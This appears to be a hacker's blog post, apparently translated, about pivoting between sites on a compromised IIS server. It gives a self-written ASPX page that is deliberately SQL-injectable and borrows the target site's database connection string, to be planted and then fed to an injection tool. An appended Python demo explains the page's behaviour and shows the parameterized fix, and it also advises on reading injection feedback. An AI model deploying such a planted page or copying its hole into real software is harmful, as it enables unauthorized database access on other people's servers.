Yesterday 4z1 and I were looking at a site. Privilege escalation was really hard; we stared at it for a full 5 hours and got nowhere. 2008 + IIS7, no sa, no root, no services of any kind...
Along the way we used aspx constructed injection to cross over to another site. Found a pile of code online, and not one piece of it worked.
It's not much code, so I just wrote one myself. Annoying as hell.
<%@ Page Language="C#" AutoEventWireup="true" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影 aspx constructed-injection page</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
    <script language="c#" runat="server">
        // Runs on every request. The query is built by string concatenation on
        // purpose: this page IS the injection point you hand to your injection
        // tool, and it borrows the target's own connection string from web.config.
        void Page_Init(object sender, EventArgs e)
        {
            System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
            // Replace "ConnectionName" with the name of a <connectionStrings> entry in the site's web.config
            conn.ConnectionString = ConfigurationManager.ConnectionStrings["ConnectionName"].ConnectionString;
            conn.Open();

            string i = this.Page.Request.Params["xxser"]; // the injectable parameter: ?xxser=13
            // Replace [TableName] / ColumnName with a real table and a numeric column
            System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [TableName] where ColumnName = " + i, conn);
            // ExecuteNonQuery returns -1 for a SELECT, so x only tells you the
            // statement ran; SQL errors come back as the ASP.NET error page.
            int x = command.ExecuteNonQuery();
            Response.Write(i + "\n");
            Response.Write(x);
            conn.Close();
        }
    </script>
    </div>
    </form>
</body>
</html>
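Added example, not code from the post above: a Python stand-in for what the aspx page does, using an in-memory SQLite table (constructed here; the real page hits MSSQL through the site's connection string). It shows why the page is injectable (the parameter is concatenated into the SQL), what feedback the tool actually gets from it (ExecuteNonQuery-style "rows affected" is -1 for any SELECT, so true/false payloads look identical and only SQL errors stand out), and the parameterized form that closes the hole. Table name, column name and rows are assumptions for the demo.

```python
import sqlite3

# Constructed sample data for the demo; the real target table is unknown.
SAMPLE_ROWS = [(1, "alice"), (2, "bob"), (13, "carol")]


def make_db():
    """Create a throwaway database with a table the page-style query can hit."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table [users] (id integer, name text)")
    conn.executemany("insert into [users] values (?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def page_output(conn, xxser):
    """Emulate the aspx page: concatenate ?xxser= into the SQL, run it, and
    echo the parameter plus the 'rows affected' count, as Response.Write does.
    The error branch stands in for the ASP.NET error page the tool would see."""
    cur = conn.cursor()
    try:
        cur.execute("select * from [users] where id = " + xxser)
    except sqlite3.Error as exc:
        return "ERROR: " + str(exc)
    # DB-API cursor.rowcount is -1 for a SELECT, like SqlCommand.ExecuteNonQuery.
    return xxser + "\n" + str(cur.rowcount)


def x_value(conn, xxser):
    """The only signal the page gives back: the count (-1) or None on a SQL error."""
    out = page_output(conn, xxser)
    return None if out.startswith("ERROR") else int(out.split("\n")[1])


def rows_actually_selected(conn, xxser):
    """What the injected statement really selected (the page never shows this)."""
    return conn.execute("select * from [users] where id = " + xxser).fetchall()


def parameterized_rows(conn, xxser):
    """Hardened counterpart: the same query with a bound parameter, so the
    payload is compared as data and never reaches the SQL parser."""
    cur = conn.cursor()
    cur.execute("select * from [users] where id = ?", (xxser,))
    return cur.fetchall()


if __name__ == "__main__":
    db = make_db()
    for payload in ("13", "13 and 1=1", "13 and 1=2", "13 or 1=1", "13'"):
        print(repr(payload), "->", page_output(db, payload).replace("\n", " | "))
    print("parameterized, payload '13 or 1=1':", parameterized_rows(db, "13 or 1=1"))
```

Because x is -1 whether the injected condition is true or false, a tool pointed at this page has to work from errors (or timing), not from the page body; if you want boolean feedback you have to read rows instead of calling ExecuteNonQuery.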